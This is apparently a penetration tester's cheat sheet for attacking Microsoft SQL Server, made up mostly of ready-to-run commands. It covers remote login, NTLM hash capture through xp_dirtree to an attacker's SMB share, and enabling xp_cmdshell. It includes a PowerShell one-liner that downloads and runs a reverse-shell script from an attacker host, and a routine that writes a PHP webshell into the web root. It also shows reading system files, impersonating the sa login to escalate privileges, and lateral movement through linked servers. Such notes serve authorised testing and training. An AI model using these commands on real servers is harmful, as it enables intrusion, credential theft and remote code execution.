MSSQL

sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30

MSSQL default system schemas/databases:

• master - keeps the information for an instance of SQL Server.

• msdb - used by SQL Server Agent.

• model - a template database copied for each new database.

• resource - a read-only database that keeps system objects visible in every database on the server in sys schema.

• tempdb - keeps temporary objects for SQL queries.

Login it to mssql remotely

sqsh -S $ip -U sa -P <PASSWORD>

alternatively use

mssqlclient.py user:password@$ip -windows-auth

or without --windows-auth

mssqlclient.py user:password@$ip

Interactive with MSSQL

Check for users with SA level permissions (users that can enable xp_cmdshell)

select IS_SRVROLEMEMBER ('sysadmin')

Run after spinning up an smbserver to capture hash

exec master..xp_dirtree '\\<attacker ip>\<share name>\',1,1
GO

EXEC master..xp_subdirs '\\10.10.110.17\share\'
GO

Check if xp_cmdshell is enabled

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

Show Advanced Options

sp_configure 'show advanced options', '1'

RECONFIGURE

Enable xp_cmdshell

sp_configure 'xp_cmdshell', '1'

RECONFIGURE

EXEC master..xp_cmdshell 'whoami'

xp_cmdshell powershell iex(new-objectnet.webclient).downloadstring(\"http://AttackerIP/Invoke-PowerShellTcp.ps1\")

Enable File Write (Ole Automation Procedures)

sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
sp_configure 'Ole Automation Procedures', 1
GO
RECONFIGURE
GO

To write files using MSSQL, we need to enable Ole Automation Procedures, which requires admin privileges, and then execute some stored procedures to create the file

Write File

DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
GO

Read File

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
GO

By default, MSSQL allows file read on any file in the operating system to which the account has read access

Impersonate Existing Users

Identify Users that We Can Impersonate

select distinct b.name from sys.server_permissions a inner join sys.server_principals b on a.grantor_principal_id = b.principal_id where a.permission_name = 'IMPERSONATE'
GO

SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends. Sysadmins can impersonate anyone by default, But for non-administrator users, privileges must be explicitly assigned.

Verifying our Current User and Role

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
go

the returned value 0 indicates, we do not have the sysadmin role, but we can impersonate the sa user

Impersonating the SA User

EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO

It's recommended to run EXECUTE AS LOGIN within the master DB, because all users, by default, have access to that database. If a user you are trying to impersonate doesn't have access to the DB you are connecting to it will present an error. Try to move to the master DB using USE masterWe can now execute any command as a sysadmin as the returned value 1 indicates.

Communicate with Other Databases with MSSQL

Identify linked Servers in MSSQL

SELECT srvname, isremote FROM sysservers
GO

If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server. Administrators can configure a linked server using credentials from the remote server. If those credentials have sysadmin privileges, we may be able to execute commands in the remote SQL instance. As we can see in the query's output, we have the name of the server and the column isremote, where 1 means is a remote server, and 0 is a linked server

EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
GO

Attempt to identify the user used for the connection and its privileges. The EXECUTE statement can be used to send pass-through commands to linked servers. If we need to use quotes in our query to the linked server, we need to use single double quotes to escape the single quote. To run multiples commands at once we can divide them up with a semi colon (;).